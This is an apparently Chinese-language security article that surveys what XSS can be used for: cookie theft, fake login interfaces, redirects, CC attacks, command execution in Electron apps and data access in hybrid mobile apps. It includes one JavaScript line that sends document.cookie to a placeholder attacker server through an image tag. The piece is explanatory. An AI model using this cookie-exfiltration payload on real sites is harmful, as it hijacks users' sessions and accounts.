XSS的各類用途

0x01 最多見之竊取用戶cookie

當cookie沒有設置HttpOnly屬性時,能夠經過javascript代碼建立img,script,iframe等標籤,並把src屬性設置爲本身部署的xss cookie接收平臺,以url拼接document.cookie的形式把瀏覽頁面的用戶的cookie傳遞給本身

由於https的網站默認不能加載http的js,因此通常都會建立img標籤

var i = document.createElement('img');i.src = 'http://你的服務器地址?cookie=' + document.cookie 

0x02 界面劫持/僞造界面

攻擊者能夠構造html/css/javascript代碼,製做出一個與原網站風格類似的登陸界面,或者把一些html元素進行移動/覆蓋/遮擋,或者利用javascript的特性,從新定義頁面的函數和變量,使得原來的功能被篡改

大概是兩三年前,刷貼吧時發現有人曝光一個淘寶奸商,主要特色是他的商品評價只能看好評,點中差評無反應.分析了一下發現是奸商在編輯商品詳情時(富文本編輯器 + 自定義行內樣式),建立了一個比較大的div,遮擋住了中差評的選項

0x03 重定向頁面

通常用於導流量,常見於黑產給菠菜網站導流

0x04 CC攻擊

在2015年時,百度統計代碼http://hm.baidu.com/h.js被劫持,其內容被加入了一個死循環並在間隔很短的時間內請求github的代碼,致使大量引用了http://hm.baidu.com/h.js的網站變相對github進行CC攻擊

0x05 命令執行

近年來前端飛速發展,有了能夠利用html開發桌面應用的框架,表明做有electron,nw.js.主要原理就是編寫好html/css/js,以electron或nw.js去啓動,特色是能夠調用Node.Js的內置函數,如child_process.exec(命令執行)等.

基於這2個框架開發的比較出名程序有

• vscode
• atom
• 網易雲音樂
• 阿里釘釘

0x06 經過hybrid app獲取手機通信錄,短信,地理位置,相冊等敏感信息

隨着前端飛速發展,不單單是桌面開發能夠利用html,手機app一樣也能夠利用html來開發,主要原理是經過封裝系統自帶的webview,給出api提供javascript調用

封裝有獲取通信錄等原生app功能的框架有

國外的:

• React Native
• Ionic
• Cordova
• PhoneGap

國內的:

• AppCan
• APICloud
• DCloud

針對hybrid app的XSS文章目前還比較少見,大概是不多白帽子會關注這類混合app開發框架,而挖到XSS時只是當成一個普通的XSS而沒有嘗試探測app使用的框架,而後去翻文檔嘗試調用獲取聯繫人等api?

介紹：請勿用於非法用途，本文僅供技術交流學習探討。本文部分資源來源於網絡，若有侵權請聯繫版主刪除。